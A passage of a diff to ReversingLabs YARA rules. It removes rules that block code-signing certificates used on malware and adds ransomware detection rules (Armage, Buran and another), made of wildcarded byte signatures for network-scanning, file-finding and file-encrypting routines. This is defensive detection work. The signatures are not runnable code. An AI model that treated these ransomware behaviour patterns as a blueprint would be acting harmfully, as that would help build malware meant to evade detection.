+            ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B 45 ??
+            33 C9 2B 48 ?? 8B 55 ?? 8B 42 ?? 8B 0C 88 51 FF 15 ?? ?? ?? ?? DD 9D ?? ?? ?? ?? 8B
+            55 ?? 33 C0 2B 42 ?? 8B 4D ?? 8B 51 ?? 8B 04 82 50 FF 15 ?? ?? ?? ?? DC AD ?? ?? ??
+            ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 0D ?? ?? ?? ?? DC 85 ?? ?? ?? ?? DD 5D ??
+            C7 45 ?? ?? ?? ?? ?? DD 45 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 89 41 ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+        }
+		$scan_network_p3 = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ??
+            ?? 52 8D 85 ?? ?? ?? ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 8B 02 89 85 ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ??
+            ?? 50 8D 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 FF 15
+            ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 8B 11 8B 85 ?? ?? ?? ?? 50 FF 52 ?? DB E2 89 85 ??
+            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8B 95
+            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? 8B 45 ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 55 ?? 52
+            FF 15 ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8B 08 8B 95 ?? ?? ?? ?? 52 FF 51 ?? DB E2 89
+            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
+        }
+		$scan_network_p4 = {
+            8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52
+            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 8B 45 ?? 50 FF 92 ?? ?? ?? ?? 50 8D 4D ?? 51
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8B 95 ?? ?? ?? ?? 8B 02 8B 8D ?? ?? ?? ??
+            51 FF 50 ?? DB E2 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7D ?? 6A ?? 68 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 4D ?? FF 15 ?? ?? ?? ?? 9B 68 ?? ?? ?? ?? EB ?? 8D
+            4D ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ??
+            83 C4 ?? 8D 4D ?? 51 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? C3 8D 85 ?? ?? ??
+            ?? 50 8D 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? FF 15 ?? ?? ??
+            ?? 8D 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? C3 8B 4D
+            ?? 8B 11 8B 45 ?? 50 FF 52 ?? 8B 4D ?? 66 8B 55 ?? 66 89 11 8B 45 ?? 8B 4D ?? 64 89
+            0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGANICUP ApS" and pe.signatures [ i ] . serial == "2f:64:67:72:54:d3:84:4e:fd:ac:29:22:12:3d:05:d1" and 1605640092 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $scan_network_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Armage : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Armage ransomware."
 		author = "ReversingLabs"
-		id = "22bd8590-7a95-564c-ad77-fb20569de51d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "94cf639b-7d9e-51ca-b547-e0d591581df2"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6480-L6496"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "73d80e6a0dc2316524a55a9627792b9b4488d238ef529f1767de182956b0865e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Armage.yara#L1-L128"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "aa8ddcbb0fdcad15e603e000db1d4f86eae7d42efce1c1d21dc3dd57ee9f4319"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Armage"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foxstyle LLC" and pe.signatures [ i ] . serial == "32:fb:f8:cf:a4:3d:ca:3f:85:ef:ab:e9:6d:fe:fa:49" and 1598255906 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Ef9D0Cf071D463Cd63D13083046A7B8D : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "8751f71b-0ebb-5820-927c-684a5ae5ee7b"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6498-L6516"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2923979811504f78a79a2480600285a2697845e51870a44ed231a81e79807121"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            55 89 E5 53 8D 5D ?? 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 8D 5D
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 65 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45
+            ?? 8D 50 ?? 8D 48 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C6 40 ?? ?? 89 50 ?? 89
+            95 ?? ?? ?? ?? 8D 50 ?? 89 50 ?? 89 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 5D ?? 83 EC ?? 89 5D ??
+            8B 41 ?? 8B 51 ?? 8D 4D ?? 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 45 ?? 8D 5D ?? 83 EC ?? 89 5C 24 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 45 ?? 8D 5D ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 89 42 ?? 8B 55 ?? 89 4C 24 ?? 89 04 24 29 CA 89 54 24
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? 89 42 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 55 ?? 89 42
+            ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ??
+            8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4C 24 ?? 89 8D ?? ?? ?? ?? 89 4C 24 ?? 8B 85 ?? ?? ??
+            ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 44 24
+            ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 5C 24 ?? 8B 8D ??
+            ?? ?? ?? 89 4C 24 ?? 89 85 ?? ?? ?? ?? 89 44 24 ?? 8B 55 ?? 8B 42 ?? 89 04 24 E8 ??
+            ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8D 45 ?? 89 04 24 E8
+        }
+		$encrypt_files_p2 = {
+            8B 55 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? 8D 4A ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D
+            55 ?? 83 EC ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? 8B 40 ?? 8B 80 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 80 78 ?? ?? 74 ?? 0F BE 40 ?? 89 04 24 B9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            8B 45 ?? 85 C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D
+            ?? C9 C3 90 8B 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8B 00 8B 50 ?? B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 74 ?? C7 04 24 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? FF D2 83 EC ?? 0F BE C0 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89
+            85 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83
+            E8 ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85
+            C0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 3B 85 ?? ?? ?? ?? 74 ?? 89 04 24
+            E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 39 85 ?? ?? ?? ?? 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0
+            75 ?? EB
+        }
+		$find_files_p1 = {
+            55 89 E5 81 EC ?? ?? ?? ?? 8D 55 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 89 55 ?? 8D 55 ?? 89 65 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ??
+            8B 4D ?? 83 C0 ?? 8B 51 ?? 89 45 ?? 8D 45 ?? 89 45 ?? 8B 45 ?? 89 55 ?? 8B 00 89 C1
+            89 45 ?? 01 D1 74 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 45 ?? 83 F8 ?? 89 45 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B
+            45 ?? 8D 55 ?? 0F B6 00 88 45 ?? B8 ?? ?? ?? ?? 89 45 ?? C6 04 02 ?? B8 ?? ?? ?? ??
+            2B 45 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89
+            04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 83 EC ?? 89 81 ?? ?? ??
+            ?? 8D 4D ?? 39 CA 74 ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? 83 F8
+        }
+		$find_files_p2 = {
+            8B 45 ?? 0F 95 00 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? C9 C2 ?? ?? 8D 76 ?? 8D 45 ?? 8B
+            4D ?? 89 4C 24 ?? 8B 4D ?? 89 04 24 89 4C 24 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? E9
+            ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 C7 45 ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8B 55 ?? 83 EC ?? 89 45 ?? 89 55 ?? EB ?? C7 04 24 ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C5 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 85 C0 74 ?? 83 E8
+            ?? 74 ?? 0F 0B 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 66 90 55 89 E5 57 56 8D 45 ?? 53 83 EC ??
+            89 45 ?? 8D 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 89 65 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 5D ?? C6 45 ?? ?? 8B 83 ?? ?? ??
+            ?? 83 F8 ?? 74 ?? 8D 53 ?? 89 04 24 89 54 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 EC ?? 85 C0 0F 95 45 ?? 0F B6 45 ?? 8B 75 ?? 88 06 8B 45 ?? 89 04 24 E8 ?? ?? ??
+            ?? 0F B6 45 ?? 8D 65 ?? 5B 5E 5F 5D C3
+        }
+		$enum_resources_p1 = {
+            55 B8 ?? ?? ?? ?? 89 E5 E8 ?? ?? ?? ?? 29 C4 8D 45 ?? 89 8D ?? ?? ?? ?? 89 A5 ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C9 C2 ?? ??
+            8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44
+            24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? 8D 85 ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 75 ?? EB
+            ?? 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 85 ?? ?? ?? ?? 83 85 ?? ??
+            ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 0F 83
+        }
+		$enum_resources_p2 = {
+            8B 85 ?? ?? ?? ?? F6 40 ?? ?? 74 ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 85 D2 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ??
+            ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 48 ?? 3B 48 ?? 0F 84 ?? ?? ??
+            ?? 85 C9 74 ?? 8D 41 ?? 8B 95 ?? ?? ?? ?? 89 01 8B 85 ?? ?? ?? ?? 01 C2 89 04 24 89
+            54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B
+            48 ?? 8B 85 ?? ?? ?? ?? 83 C1 ?? 89 48 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 39 C8
+            0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? F6 40 ?? ?? 0F 84 ?? ??
+            ?? ?? 89 04 24 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC
+            ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 0C 24 89 44 24 ?? 8B 8D ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? EB
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rubin LLC" and ( pe.signatures [ i ] . serial == "00:ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" or pe.signatures [ i ] . serial == "ef:9d:0c:f0:71:d4:63:cd:63:d1:30:83:04:6a:7b:8d" ) and 1605358307 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_115Cf1353A0E33E19099A4867A4C750A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Buran : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Buran ransomware."
 		author = "ReversingLabs"
-		id = "c2564461-6731-5d7b-8dbb-560929b568d0"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c2a36a8b-5c21-5c31-994d-b424c038dd21"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6518-L6536"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2a3353c655531b113dc019a86288310881e3bbcb6c03670a805f22b185e09e6c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Buran.yara#L1-L91"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5606e0acecd99ccf2feaa995353211302903a09bb2c4ec65903566215e2d5ca4"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Buran"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "212 NY Gifts, Inc." and ( pe.signatures [ i ] . serial == "00:11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a" or pe.signatures [ i ] . serial == "11:5c:f1:35:3a:0e:33:e1:90:99:a4:86:7a:4c:75:0a" ) and 1605515909 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_5Cf3778Bb11115A884E192A7Cb807599 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "cd643ad5-254a-5c53-a6f2-b263ff539cd3"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6538-L6556"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4242ef4a30bb09463ec5a6df9367915788a2aa782df6c463bcf966d2aad63c1d"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D
+            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            89 5D ?? 89 5D ?? 88 8D ?? ?? ?? ?? 88 95 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
+            30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33
+            C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ??
+            8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84
+            C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0
+            74 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 33 C9 8B 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59
+            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9
+        }
+		$encrypt_files = {
+            53 56 57 55 BB ?? ?? ?? ?? BF ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3F ?? 74 ?? 8B 07 89
+            C6 33 C0 89 07 FF D6 83 3F ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 33 C0 A3 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 33 C0 89
+            43 ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 76 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? 8B 7B ?? 85 FF 74
+            ?? 8B C7 E8 ?? ?? ?? ?? 8B 6B ?? 8B 75 ?? 3B 75 ?? 74 ?? 85 F6 74 ?? 56 E8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? FF 53 ?? 80 7B ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 3B
+            ?? 75 ?? 83 3D ?? ?? ?? ?? ?? 74 ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B 03 8B F0 8B FB B9 ?? ?? ?? ?? F3 A5 E9 ?? ?? ?? ?? 5D 5F 5E 5B C3 A3
+        }
+		$remote_connection_p1 = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 50 83 C4 ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 5D ?? 8B D9 89 55 ?? 89
+            45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF
